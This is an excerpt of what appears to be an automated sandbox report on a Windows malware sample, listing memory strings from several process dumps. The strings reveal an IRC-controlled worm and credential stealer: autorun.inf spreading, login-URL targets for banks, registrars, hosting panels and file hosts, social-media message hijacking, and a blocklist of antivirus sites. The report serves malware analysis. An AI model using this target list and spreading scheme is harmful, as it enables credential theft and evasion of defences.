*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
